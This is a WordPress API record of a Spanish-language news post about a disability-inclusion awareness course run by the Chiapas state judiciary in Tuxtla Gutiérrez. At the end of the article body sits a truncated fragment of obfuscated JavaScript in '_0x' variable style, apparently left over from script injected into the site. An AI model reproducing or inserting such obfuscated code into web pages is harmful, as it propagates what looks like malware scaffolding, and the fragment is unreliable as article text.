{"id":21993,"date":"2025-05-20T04:03:29","date_gmt":"2025-05-20T04:03:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21993"},"modified":"2025-05-20T04:03:30","modified_gmt":"2025-05-20T04:03:30","slug":"imparte-poder-judicial-curso-de-sensibilizacion-en-inclusion-laboral-de-personas-con-discapacidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21993","title":{"rendered":"Imparte Poder Judicial curso de sensibilizaci\u00f3n en inclusi\u00f3n laboral de personas con discapacidad"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"21994\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-1024x678.jpg\" alt=\"\" class=\"wp-image-21994\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0019-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"21995\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-1024x678.jpg\" alt=\"\" class=\"wp-image-21995\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0020-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"678\" data-id=\"21996\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-1024x678.jpg\" alt=\"\" class=\"wp-image-21996\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-1024x678.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-768x509.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-1536x1017.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-2048x1356.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250519-WA0021-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>19 de mayo del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ), realiz\u00f3 el curso Sensibilizaci\u00f3n a la inclusi\u00f3n laboral de personas con discapacidad, con el objetivo de que las y los servidores pudieran experimentar y comprender el entorno que viven las personas con discapacidad.<\/p>\n\n\n\n<p>Desde el Aula Magna del edificio \u201cC\u201d de la sede judicial de Tuxtla Guti\u00e9rrez, se dieron cita las y los integrantes del Comit\u00e9 de Igualdad Laboral y No Discriminaci\u00f3n, de Oficial\u00eda Mayor, titulares de las diversas direcciones, as\u00ed como personas servidoras adscritas a las \u00e1reas administrativas, quienes recibieron esta capacitaci\u00f3n por parte del integrante de esta familia judicial, C\u00e9sar Andr\u00e9s Cruz Palacios.<\/p>\n\n\n\n<p>Al dar las palabras de bienvenida, el director del IFPyCJ, Jos\u00e9 Luis Baltazar Arg\u00fcello, invit\u00f3 a las y los presentes a aprovechar al m\u00e1ximo este curso y aplicar las herramientas adquiridas en la vida cotidiana, especialmente, en la atenci\u00f3n a las personas usuarias con alguna discapacidad que solicitan servicios en el Poder Judicial, con el objetivo de reforzar la construcci\u00f3n de sociedades con una cultura de la inclusi\u00f3n y con un sentido m\u00e1s humanista.<\/p>\n\n\n\n<p>Durante el desarrollo de esta actividad, el ponente Cruz Palacios, quien es una persona con discapacidad visual que ha impartido diferentes cursos y talleres sobre este tema, realiz\u00f3 din\u00e1micas enfocadas a que las y los participantes pudieran sensibilizarse sobre el entorno, las barreras f\u00edsicas, sociales y emocionales que d\u00eda con d\u00eda enfrentan las personas con alguna discapacidad.<\/p>\n\n\n\n<p>Al concluir este curso, la coordinadora del Voluntariado del Poder Judicial de Chiapas, Betsy Tenorio, hizo entrega de un reconocimiento de participaci\u00f3n al ponente, quien agradeci\u00f3 al presidente Juan Carlos Moreno Guill\u00e9n, as\u00ed como a la presidenta del Voluntariado, Dalal Rabann Castell, por la oportunidad de impartir el curso y por las acciones que se emprenden en esta nueva era de la inclusi\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 19 de mayo del 2025. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial (IFPyCJ), realiz\u00f3 el curso Sensibilizaci\u00f3n a la inclusi\u00f3n laboral de personas con discapacidad, con el objetivo de que las y los servidores pudieran experimentar y comprender el entorno que viven las personas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21995,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21993","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21993","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21993"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21993\/revisions"}],"predecessor-version":[{"id":21997,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21993\/revisions\/21997"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21995"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21993"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21993"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21993"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}